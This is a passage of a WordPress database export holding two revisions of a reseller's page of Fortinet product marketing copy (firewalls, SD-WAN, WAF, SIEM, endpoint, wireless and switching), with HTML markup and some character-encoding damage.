an AP, our AP Product selector can be found here. Configuration and control of your wireless environment can be done directly with a FortiGate or via our dedicated Wireless LAN controllers. Fortinet also offers FortiManager and FortiCloud as management solutions for the entire Fortinet security fabric. All Fortinetâ€™s wireless solutions integrate with our location analytics platform: FortiPresence. This enables real-time locationing and device tracking.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntegration with FortiGate firewalls extends your security fabric out to the edge of the network.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Superior density, scalability and mobilit</strong><strong>y</strong></h5>\r\n</li>\r\n</ul>\r\nHandle even the most complex RF environments.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Zero-touch deployment</strong></h5>\r\n</li>\r\n</ul>\r\nFast and simple deployment with no requirements for onsite tech support.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Simplified deployment and capacity expansion</strong></h5>\r\n</li>\r\n</ul>\r\nNo licenses to manage, just plug and go.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Free location and analytics</strong></h5>\r\n</li>\r\n</ul>\r\nWireless device locationing tools included with no additional licenses required.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Scalability from 1 to 10,000 APs</strong></h5>\r\n</li>\r\n</ul>\r\nA range of platforms for any sized deployment.\r\n\r\n&nbsp;\r\n<h4>3.Â <strong>Switching</strong></h4>\r\nLegacy Ethernet LANs face many challenges including exponential growth in devices and applications, increased throughput demands from wireless LANs, and complex security implementations. Rather than asking how to secure traditional Ethernet LANs, Fortinet takes a security centric approach offering Ethernet as an extension of the security infrastructure through FortiSwitch and FortiLink. FortiSwitch offers a broad portfolio of secure, simple, and scalable Ethernet switches for applications that range from desktop to data center.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration with FortiLink</strong></h5>\r\n</li>\r\n</ul>\r\nFortiGate management of FortiSwitch extends Security Fabric features to the Ethernet access layer.\r\n<ul>\r\n 	<li>\r\n<h5><strong>No Touch Provisioning and Management with FortiLink</strong></h5>\r\n</li>\r\n</ul>\r\nAuto discovery, Global VLAN and Security Policies, Firewall interfaces and Ethernet ports equally secure.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Highly Scalable</strong></h5>\r\n</li>\r\n</ul>\r\nBroad portfolio of stackable 1, 10, and 40 GE access ports with up to 100 GE uplinks to scale from desktop to datacenter.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Unparalleled Visibility</strong></h5>\r\n</li>\r\n</ul>\r\nSingle pane of glass management of both Security and Network Access, Device detection and port visibility.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Enable voice, data, and wireless traffic across a single network</strong></h5>\r\n</li>\r\n</ul>\r\nPower network and IoT devices with POE, Auto provision using LLDP-MED.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Virtual Stacking</strong></h5>\r\n</li>\r\n</ul>\r\nFortiLink enables stacking across IDFs when managed, up to 300 switches based on FortiGate model.\r\n\r\n&nbsp;\r\n<h4>4.Â <strong>Email Security</strong></h4>\r\nEmail security remains a key productivity tool for today\'s organizations, as well as a successful attack vector for cyber criminals. FortiMail Email security utilizes the latest technologies and security services from FortiGuard Labs to deliver consistently top-rated protection from common and advanced threats while integrating robust data protection capabilities to avoid data loss.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Top-rated Antispam and Antiphishing</strong></h5>\r\n</li>\r\n</ul>\r\nMaintain productivity by shielding end users from unwanted spam and malicious phishing attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Independently certified advanced threat defense</strong></h5>\r\n</li>\r\n</ul>\r\nThwart cyber criminals intent on stealing data, holding systems for ransomware, conducting fraud, and other malicious purposes.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Integrated data protection</strong></h5>\r\n</li>\r\n</ul>\r\nMaintain the privacy of personal information and confidentiality of sensitive data in compliance with regulatory and corporate guidelines.\r\n<ul>\r\n 	<li>\r\n<h5><strong>High-performance mail handling</strong></h5>\r\n</li>\r\n</ul>\r\nSpeed the delivery of legitimate email at an affordable cost.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Enterprise-class management</strong></h5>\r\n</li>\r\n</ul>\r\nFree staff and end users to drive the business by reducing time spent on email administration.\r\n\r\n&nbsp;\r\n<h2>APPLICATION SECURITY</h2>\r\n<h4><strong>1. Web Application Firewall (WAF)</strong></h4>\r\nUnprotected web applications are the easiest point of entry for hackers and vulnerable to a number of attack types. FortiWebâ€™s AI-enhanced and multi-layered approach protects your web apps from the OWASP Top 10 and more. When combined with our Web Application Security Service from FortiGuard Labs youâ€™re protected from the latest application vulnerabilities, bots, and suspicious URLs, and with dual machine learning detection engines your applications are safe from sophisticated threats such as SQL injection, cross-site scripting, buffer overflows, cookie poisoning, malicious sources, and DoS attacks.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Proven Web Application Protection</strong></h5>\r\n</li>\r\n</ul>\r\nFortiWeb protects against all the OWASP Top-10 threats, DDoS attacks and many others to defend your mission critical web-based applications.\r\n<ul>\r\n 	<li>\r\n<h5><strong>AI-based Threat Detection</strong></h5>\r\n</li>\r\n</ul>\r\nIn addition to regular signature updates and many other layers of defenses, FortiWebâ€™s AI-based, dual-layer machine learning engines protect against zero-day attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntegration with FortiGate firewalls and FortiSandbox deliver protection from advanced persistent threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Hardware-based Acceleration</strong></h5>\r\n</li>\r\n</ul>\r\nFortiWeb delivers industry-leading protected WAF throughputs and blazing fast secure traffic encryption/decryption.\r\n<ul>\r\n 	<li>\r\n<h5><strong>False Positive Mitigation Tools</strong></h5>\r\n</li>\r\n</ul>\r\nAdvanced tools that minimize the day-to-day management of policies and exception lists to ensure only unwanted traffic is blocked.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Advanced Visual Analytics</strong></h5>\r\n</li>\r\n</ul>\r\nFortiWebâ€™s visual reporting tools provide detailed analyses of attack sources, types and other elements that provide insights not available with other WAF solutions.\r\n\r\n&nbsp;\r\n<h4>2.Â <strong>Application Delivery Controller</strong></h4>\r\nWith bandwidth demand growing faster than budgets and cyber-attacks constantly on the rise, it can be challenging to securely and efficiently deliver applications at the speed your users expect. Fortinet Application Delivery Controller (ADC) appliances optimize the availability, user experience, and scalability of enterprise application delivery. They enable fast, secure, and intelligent acceleration and distribution of even the most demanding enterprise applications.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Secure Traffic Management</strong></h5>\r\n</li>\r\n</ul>\r\nSSL offloading, forward proxy and visibility increase responsiveness and assist in scanning for threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Application Optimization</strong></h5>\r\n</li>\r\n</ul>\r\nSpeed web application delivery with compression, caching, HTTP 2.0, and HTTP Page Speed-UP.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration</strong></h5>\r\n</li>\r\n</ul>\r\nAV and Sandbox integration scans attachments to protect from the latest threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Global Server Load Balancing</strong></h5>\r\n</li>\r\n</ul>\r\nDistributes traffic across multiple geographical locations for disaster recovery.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Features</strong></h5>\r\n</li>\r\n</ul>\r\nWeb Application Firewall, Web Filtering, and IP Reputation for enhanced security.\r\n\r\n&nbsp;\r\n<h4>3.Â <strong>DDoS</strong></h4>\r\nDistributed Denial of Service (DDoS) attacks are ever-evolving and use a variety of technologies. To successfully combat these attacks, you need a dynamic, multi-layered security solution. FortiDDoS protects from both known and zero day attacks with very low latency. Itâ€™s easy to deploy and manage, and includes comprehensive reporting and analysis tools.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>100% security processor (SPU)-based layer 3, 4, and 7 DDoS protection application-aware traffic management.</li>\r\n 	<li>Ability to monitor hundreds of thousands of parameters simultaneously.</li>\r\n 	<li>Behavior-based DDoS protection to eliminate need for signature files.</li>\r\n 	<li>Minimal false-positive detections through continuous threat evaluation.</li>\r\n 	<li>Attack protection for DNS services via specialized tools.</li>\r\n 	<li>Defense against every DDoS attack: bulk volumetric, layer 7 application, and SSL/HTTPS.</li>\r\n</ul>\r\n&nbsp;\r\n<h2>THREAT DETECTION &amp; PREVENTION</h2>\r\n<h4><strong>Sandbox</strong></h4>\r\nWith the increasing volume and sophistication of cyber-attacks, it takes only one threat to slip through security for a data breach to occur. CISOs have adopted sandboxing as an essential component of their security strategies to help combat previously unknown threats. While attack surfaces are becoming more dynamic due to the rise of IoT and cloud-based services, a continuing shortage of cyber security talent is driving organizations to integrate sandboxing with greater controls and a high degree of automation.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad integration</strong></li>\r\n</ul>\r\nExtends advanced threat protection to your next-generation firewall, web application firewall, secure email gateway, and endpoint protection platform.\r\n<ul>\r\n 	<li><strong>Intelligent automation</strong></li>\r\n</ul>\r\nSpeeds mitigation by sharing real-time updates to disrupt threats at the origin and subsequent immunization across the entire organization and the global community.\r\n<ul>\r\n 	<li><strong>All-in-one</strong></li>\r\n</ul>\r\nSimplifies deployment and reduces complexity by covering all protocols in a single common sandbox platform.\r\n<ul>\r\n 	<li><strong>Flexible deployment</strong></li>\r\n</ul>\r\nAvailable as a physical or virtual appliance on premises, as well as a cloud-based or managed service.\r\n<ul>\r\n 	<li><strong>Open extensibility</strong></li>\r\n</ul>\r\nFlexible APIs for easy third-party integration and available day-zero integration with Fabric-Ready partners.\r\n\r\n2.Â <strong>FortiSIEM</strong>\r\n\r\nSecurity management only gets more complex. Endpoints, IoT, Infrastructure, Security Tools, Applications, VMâ€™s and Cloud â€“ the number of things you need to secure and monitor grows constantly. FortiSIEM â€“ Fortinetâ€™s Multivendor Security Incident and Events Management solution brings it all together. Visibility, Correlation, Automated Response and Remediation in a single, scalable solution. Using a Business Services view, the complexity of managing network and security operations is reduced, freeing resources, improving breach detection. Worldwide 80% of breaches go undetected because of skills shortage and event information â€˜noiseâ€™. FortiSIEM provides the cross correlation, applies machine learning and UEBA to improve response, to stop breaches before they occur.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Asset Self-Discovery</strong></h5>\r\n</li>\r\n</ul>\r\nVisibility needs to be both comprehensive and granular â€“ understanding a devices contextual capabilities and vulnerabilities reduces false positives.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Rapid Integrations and Scalability</strong></h5>\r\n</li>\r\n</ul>\r\nNetwork aware and security tool agnostic operations and management get a real-time business view of availability, utilization and security posture.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Automated Workflow</strong></h5>\r\n</li>\r\n</ul>\r\nA leading SOAR (Security Orchestration and Automated Response engine) the FortiSIEM Remediation Library responds to threats with the security tools you have today, and will grow with your enterprise.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Unified Platform</strong></h5>\r\n</li>\r\n</ul>\r\nMulti-tenancy for role-based access to a unified platform. Of benefit to MSPâ€™s and Enterprise customers alike â€“ deliver services and reports to a customer or a report. Share actionable intelligence and deliver value without compromise.\r\n\r\n&nbsp;\r\n<h4>3.Â <strong>User and Entity Behavior Analytics (UEBA)</strong></h4>\r\nFortinet User and Entity Behavior Analytics (UEBA) technology protects organizations from insider threats by continuously monitoring users and endpoints with automated detection and response capabilities. Leveraging machine learning and advanced analytics, Fortinet UEBA automatically identifies non-compliant, suspicious, or anomalous behavior and rapidly alerts any compromised user accounts. This proactive approach to threat detection delivers an additional layer of protection and visibility, whether users are on or off the corporate network.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Augmented Intelligence (AI)</strong></h5>\r\n</li>\r\n</ul>\r\nEnhanced data visibility with machine learning and UEBA to identify threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Rapid Threat Detection</strong></h5>\r\n</li>\r\n</ul>\r\nAI optimizes each stage of the threat investigation pipeline, shining a light on the unknown.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Regulatory Compliance Support</strong></h5>\r\n</li>\r\n</ul>\r\nSupport regulatory compliance with a dedicated reporting tool, to respond to and manage potential non-compliant activity.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Data Security</strong></h5>\r\n</li>\r\n</ul>\r\nMonitor data movement and endpoint activity 24/7 regardless of location or device, whether users are on or off your network.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Forensic-level Reporting</strong></h5>\r\n</li>\r\n</ul>\r\nCompile a full forensic history of user behavior, enabling thorough forensics investigation and detailed reporting.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Valuable Insights</strong></h5>\r\n</li>\r\n</ul>\r\nAnalyze data and deliver valuable insights, allowing your team to contain insider threats and respond in real time.\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','Fortinet','','inherit','closed','closed','','1474-revision-v1','','','2019-09-30 14:24:22','2019-09-30 06:24:22','',1474,'https://bintara.com.my/blog/2019/09/30/1474-revision-v1/',0,'revision','',0),(3565,1,'2019-09-30 14:25:44','2019-09-30 06:25:44','<strong style=\"font-size: 2em; color: #000;\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">ï»¿</span>Fortinet</strong> provide top-rated network and content security, as well as secure access products that share intelligence and work together to form a cooperative fabric. Our uniqueÂ security fabricÂ combines Security Processors, an intuitive operating system, and applied threat intelligence to give you proven security, exceptional performance, and better visibility and control--while providing easier administration.\r\n\r\nFortiGate is available in a wide range of sizes and form factors to fit any environment and provides a broad array of next-generation security and networking functions. Complementary products can be deployed with a FortiGate to enable a simplified, end-to-end security infrastructure covering:\r\n<ul>\r\n 	<li>Network security</li>\r\n 	<li>Multi-Cloud security</li>\r\n 	<li>Web Application Security</li>\r\n 	<li>Email security</li>\r\n 	<li>Advanced Threat Protection</li>\r\n 	<li>Secure Unified Access</li>\r\n 	<li>Endpoint security</li>\r\n 	<li>Management and Analytics</li>\r\n</ul>\r\n&nbsp;\r\n<h2><strong>NETWORK SECURITY</strong></h2>\r\n<h4>1. Next Generation Firewall (NGFW)</h4>\r\nFortiGate enterprise firewalls offer flexible deployments from the network edge to the core, data center, internal segment, and the Cloud. FortiGate enterprise firewalls leverages purpose-built security processors (SPUs) that delivers scalable performance of advanced security services like Threat Protection, SSL inspection, and ultra-low latency for protecting internal segments and mission critical environments.\r\n<h5></h5>\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>High-performance threat protection</strong></h5>\r\n</li>\r\n</ul>\r\nIndustry\'s highest threat protection and SSL inspection performance to protect from malware attacks hiding in encrypted traffic.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Validated security effectiveness</strong></h5>\r\n</li>\r\n</ul>\r\nIndependently certified and continuous threat intelligence updates provide robust protection from known and unknown attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Protect mission critical applications</strong></h5>\r\n</li>\r\n</ul>\r\nHighly scalable segmentation and ultra-low latency to protect network segments.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Continuous risk assessment via automation</strong></h5>\r\n</li>\r\n</ul>\r\nLeverage automated workflow and auditing features to deal with scarce security staff and continuously maintain compliance posture.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntelligently share threats across the entire digital attack surface to provide quick and automated protection.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Enterprise class security management</strong></h5>\r\n</li>\r\n</ul>\r\nDeliver consistent security policy -- Single pane-of-glass to manage security assets irrespective of location and form factor.\r\n\r\n&nbsp;\r\n<h4>2.Â <strong>Secure SD-WAN</strong></h4>\r\nFortinet is the only NGFW vendor to provide native SD-WAN along with integrated advanced threat protection. Fortinet, has received the â€œRecommendedâ€ rating for the first ever test conducted by NSS Labs for Software-Defined Wide Area Networking. Fortinet delivered excellent quality of experience for voice and video, high VPN throughput and best price/performance. FortiGate SD-WAN replaces separate WAN routers, WAN optimization, and security devices with a single solution that is application-aware, offers automatic WAN path control and multi-broadband support. It improves application performance, reduces WAN Operating expenses and minimizes management complexity.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>Application aware solution, support a broad range of 3000+ applications as well as granular visibility into sub-applications.</li>\r\n 	<li>Path awareness intelligence to monitor application-level transactions, and dynamically failover to the best available path.</li>\r\n 	<li>Single-pane-of-glass management simplifies deployment, management and monitoring of SD-WAN devices.</li>\r\n 	<li>Reduced complexity and high total cost of ownership by using best of breed SD-WAN and NGFW functionality on a single appliance.</li>\r\n 	<li>Improve cloud application performance by prioritizing business critical applications and enabling branches to directly communicate to the internet.</li>\r\n 	<li>Reduce operating expenses by migrating from MPLS and utilizing multi-broadband such as Ethernet, DSL, and LTE.</li>\r\n</ul>\r\n&nbsp;\r\n<h4>3.Â <strong>IPS</strong></h4>\r\nWhether part of a firewall solution or a separate standalone appliance, Intrusion Prevention Systems (IPS) technology is becoming an increasingly ubiquitous part of network security defenses. Fortinet, well known for its next-generation firewall (NGFW) solution, has built IPS technology for more than ten years. Fortinet customers expect and depend on high performance from FortiGate firewalls and FortiGate IPS benefits from this legacy, delivering pound-for-pound, the best IPS performance available in the market today. FortiGate IPS, following a different evolution path than traditional IPS, innovates in ways that other standalone IPS products do not.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>World-class Protection</strong></h5>\r\n</li>\r\n</ul>\r\nDeep inspection for advanced threats, botnets, zero days and targeted attacks on the network.\r\n<ul>\r\n 	<li>\r\n<h5><strong>High performance</strong></h5>\r\n</li>\r\n</ul>\r\nInnovative security processor (SPU) technology for high-performance network throughput and deep security inspection.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Advanced threat protection</strong></h5>\r\n</li>\r\n</ul>\r\nSeamless integration â€“ appliance or cloud service â€“ with world-class sandboxing for advanced threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntegration and automation with Fortinetâ€™s broad product portfolio and partner ecosystem.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Data leak protection</strong></h5>\r\n</li>\r\n</ul>\r\nFile protection controls to prevent sensitive data exfiltration.\r\n\r\n&nbsp;\r\n<h4>4.Â <strong>Crypto VPNs</strong></h4>\r\nMaintaining uniform security policy for all corporate users, applications, devices irrespective of their location and appropriate access control is essential to providing security in a multi-cloud environment. The data in motion must be protected using mutual authentication and confidentiality to protect sensitive corporate data over unprotected networks and provides a defensible proof of security.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Hardware assisted encryption</strong></h5>\r\n</li>\r\n</ul>\r\nPrevent breaches and secure data in transit at a very high speed.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Scalable Security</strong></h5>\r\n</li>\r\n</ul>\r\nScalable security that is seamlessly integrated with routing.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Comprehensive data communications security</strong></h5>\r\n</li>\r\n</ul>\r\nProtects Application to Application, User to Users, User to Machine, Machine to Machine communication.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Diverse VPNs</strong></h5>\r\n</li>\r\n</ul>\r\nIPsec or SSL based diverse VPNs to offer flexible secure network choices.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration</strong></h5>\r\n</li>\r\n</ul>\r\nShare FortiTelemetry information across site-to-site tunnels with required confidentiality.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Unified Management</strong></h5>\r\n</li>\r\n</ul>\r\nSimplified, easy-to-manage, single pane of glass to manage large scale crypto VPNs, Routing and NGFW.\r\n\r\n&nbsp;\r\n<h4>5.Â <strong>Secure Web Gateway (SWG)</strong></h4>\r\nFortinet firewalls with Gateway Security protects enterprises against web attacks with URL filtering, visibility and control of encrypted web traffic via SSL inspection, and application of granular web application policies. Fortinet is the first and only gateway security vendor to earn Virus Bulletinâ€™s VBWeb certification for web filtering effectiveness.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>Feature-rich product that consolidates NGFW and SWG services.</li>\r\n 	<li>Powerful hardware that can perform SSL deep inspection.</li>\r\n 	<li>Anti-malware techniques updated with the latest threat intelligence.</li>\r\n 	<li>Reduce security teamâ€™s workload by providing a single pane of glass management for both NGFW and SWG.</li>\r\n 	<li>Effectively remove blind spots in encrypted traffic, without compromising on performance.</li>\r\n 	<li>Stay protected against the latest known and unknown internet-borne attacks.</li>\r\n</ul>\r\n&nbsp;\r\n<h4><strong>6.Â Management &amp; Reporting</strong></h4>\r\nSecurity teams globally are challenged by resource constraints, both in terms of the number of staff and raw security talent. Moreover, security teams are asked to do more, often in more complex networks and with growing numbers of alerts from multiple systems. Successful security teams allay these challenges by implementing three best practices. First, they simplify the way view management, combining operation NOC-style views with security-based SOC context. Second, they regularly measure and score their security effectiveness, enabling them anytime to answer how secure they are. Third, they demand deep integration so they can automate repetitive actions, especially across silos when possible.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Operationalized Visibility</strong></h5>\r\n</li>\r\n</ul>\r\nBig picture perspective allows you to see the forest through the tree.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Cross Silo Automation</strong></h5>\r\n</li>\r\n</ul>\r\nDeeper than mere integration, orchestrate workflow responses to triggered security events.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Simplified Management</strong></h5>\r\n</li>\r\n</ul>\r\nStreamline deployment and management, reducing task time and improving response time.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Rapid Detection</strong></h5>\r\n</li>\r\n</ul>\r\nConsolidate telemetry and alerts to uncover patterns and discover security insights.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Fortinet Fabric</strong></h5>\r\n</li>\r\n</ul>\r\nCentralized control over all of your Fortinet network assets.\r\n\r\n&nbsp;\r\n<h2>INFRASTRUCTURE PROTECTION</h2>\r\n<h4><strong>1. Endpoint Protection</strong></h4>\r\nEndpoints are frequently the target of initial compromise or attacks. FortiClient strengthens endpoint security through integrated visibility, control, and proactive defense. With the ability to discover, monitor, and assess endpoint risks, you can ensure endpoint compliance, mitigate risks, and reduce exposure. FortiClient proactively defends against advanced attacks. Its tight integration with the Security Fabric enables policy-based automation to contain threats and control outbreaks. FortiClient is compatible with Fabric-Ready partners to further strengthen enterprisesâ€™ security posture.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Broad endpoint visibility</strong></h5>\r\n</li>\r\n</ul>\r\nFortiClient Fabric Agent integrates endpoints into the Security Fabric and provides endpoint telemetry, including user identity, protection status, risk scores, unpatched vulnerabilities, security events, and more.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Proactive endpoint defense</strong></h5>\r\n</li>\r\n</ul>\r\nAnti-exploit, sandbox integration, and behavior and pattern-based malware detection proactively detect and block malware, malicious scripts, document-based, and other advanced attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Automated threat containment</strong></h5>\r\n</li>\r\n</ul>\r\nIntegration with the Security Fabric enables automated response. Mitigate unpatched vulnerabilities, alert users, and quarantine risky or compromised endpoints to stem an outbreak.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Secure remote access</strong></h5>\r\n</li>\r\n</ul>\r\nReliable, simple, and secure remote access with built-in, always-on VPN, with the added security of two-factor authentication, plus single-sign-on capabilities.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Easy to deploy and manage</strong></h5>\r\n</li>\r\n</ul>\r\nEasy to deploy and manage Modular and light-weight endpoint agents are centrally managed with the Enterprise Manager Server (EMS). Fabric Agent is compatible with Fabric-Ready endpoint security solutions.\r\n\r\n&nbsp;\r\n<h4>2.Â <strong>Wireless</strong></h4>\r\nFortinet provides a full suite of Wi-Fi Access Point and WLAN Controller products as part of our Secure Access solution designed to address the unique requirements of every organization. For assistance choosing an AP, our AP Product selector can be found here. Configuration and control of your wireless environment can be done directly with a FortiGate or via our dedicated Wireless LAN controllers. Fortinet also offers FortiManager and FortiCloud as management solutions for the entire Fortinet security fabric. All Fortinetâ€™s wireless solutions integrate with our location analytics platform: FortiPresence. This enables real-time locationing and device tracking.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntegration with FortiGate firewalls extends your security fabric out to the edge of the network.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Superior density, scalability and mobilit</strong><strong>y</strong></h5>\r\n</li>\r\n</ul>\r\nHandle even the most complex RF environments.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Zero-touch deployment</strong></h5>\r\n</li>\r\n</ul>\r\nFast and simple deployment with no requirements for onsite tech support.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Simplified deployment and capacity expansion</strong></h5>\r\n</li>\r\n</ul>\r\nNo licenses to manage, just plug and go.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Free location and analytics</strong></h5>\r\n</li>\r\n</ul>\r\nWireless device locationing tools included with no additional licenses required.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Scalability from 1 to 10,000 APs</strong></h5>\r\n</li>\r\n</ul>\r\nA range of platforms for any sized deployment.\r\n\r\n&nbsp;\r\n<h4>3.Â <strong>Switching</strong></h4>\r\nLegacy Ethernet LANs face many challenges including exponential growth in devices and applications, increased throughput demands from wireless LANs, and complex security implementations. Rather than asking how to secure traditional Ethernet LANs, Fortinet takes a security centric approach offering Ethernet as an extension of the security infrastructure through FortiSwitch and FortiLink. FortiSwitch offers a broad portfolio of secure, simple, and scalable Ethernet switches for applications that range from desktop to data center.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration with FortiLink</strong></h5>\r\n</li>\r\n</ul>\r\nFortiGate management of FortiSwitch extends Security Fabric features to the Ethernet access layer.\r\n<ul>\r\n 	<li>\r\n<h5><strong>No Touch Provisioning and Management with FortiLink</strong></h5>\r\n</li>\r\n</ul>\r\nAuto discovery, Global VLAN and Security Policies, Firewall interfaces and Ethernet ports equally secure.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Highly Scalable</strong></h5>\r\n</li>\r\n</ul>\r\nBroad portfolio of stackable 1, 10, and 40 GE access ports with up to 100 GE uplinks to scale from desktop to datacenter.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Unparalleled Visibility</strong></h5>\r\n</li>\r\n</ul>\r\nSingle pane of glass management of both Security and Network Access, Device detection and port visibility.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Enable voice, data, and wireless traffic across a single network</strong></h5>\r\n</li>\r\n</ul>\r\nPower network and IoT devices with POE, Auto provision using LLDP-MED.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Virtual Stacking</strong></h5>\r\n</li>\r\n</ul>\r\nFortiLink enables stacking across IDFs when managed, up to 300 switches based on FortiGate model.\r\n\r\n&nbsp;\r\n<h4>4.Â <strong>Email Security</strong></h4>\r\nEmail security remains a key productivity tool for today\'s organizations, as well as a successful attack vector for cyber criminals. FortiMail Email security utilizes the latest technologies and security services from FortiGuard Labs to deliver consistently top-rated protection from common and advanced threats while integrating robust data protection capabilities to avoid data loss.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Top-rated Antispam and Antiphishing</strong></h5>\r\n</li>\r\n</ul>\r\nMaintain productivity by shielding end users from unwanted spam and malicious phishing attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Independently certified advanced threat defense</strong></h5>\r\n</li>\r\n</ul>\r\nThwart cyber criminals intent on stealing data, holding systems for ransomware, conducting fraud, and other malicious purposes.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Integrated data protection</strong></h5>\r\n</li>\r\n</ul>\r\nMaintain the privacy of personal information and confidentiality of sensitive data in compliance with regulatory and corporate guidelines.\r\n<ul>\r\n 	<li>\r\n<h5><strong>High-performance mail handling</strong></h5>\r\n</li>\r\n</ul>\r\nSpeed the delivery of legitimate email at an affordable cost.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Enterprise-class management</strong></h5>\r\n</li>\r\n</ul>\r\nFree staff and end users to drive the business by reducing time spent on email administration.\r\n\r\n&nbsp;\r\n<h2>APPLICATION SECURITY</h2>\r\n<h4><strong>1. Web Application Firewall (WAF)</strong></h4>\r\nUnprotected web applications are the easiest point of entry for hackers and vulnerable to a number of attack types. FortiWebâ€™s AI-enhanced and multi-layered approach protects your web apps from the OWASP Top 10 and more. When combined with our Web Application Security Service from FortiGuard Labs youâ€™re protected from the latest application vulnerabilities, bots, and suspicious URLs, and with dual machine learning detection engines your applications are safe from sophisticated threats such as SQL injection, cross-site scripting, buffer overflows, cookie poisoning, malicious sources, and DoS attacks.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Proven Web Application Protection</strong></h5>\r\n</li>\r\n</ul>\r\nFortiWeb protects against all the OWASP Top-10 threats, DDoS attacks and many others to defend your mission critical web-based applications.\r\n<ul>\r\n 	<li>\r\n<h5><strong>AI-based Threat 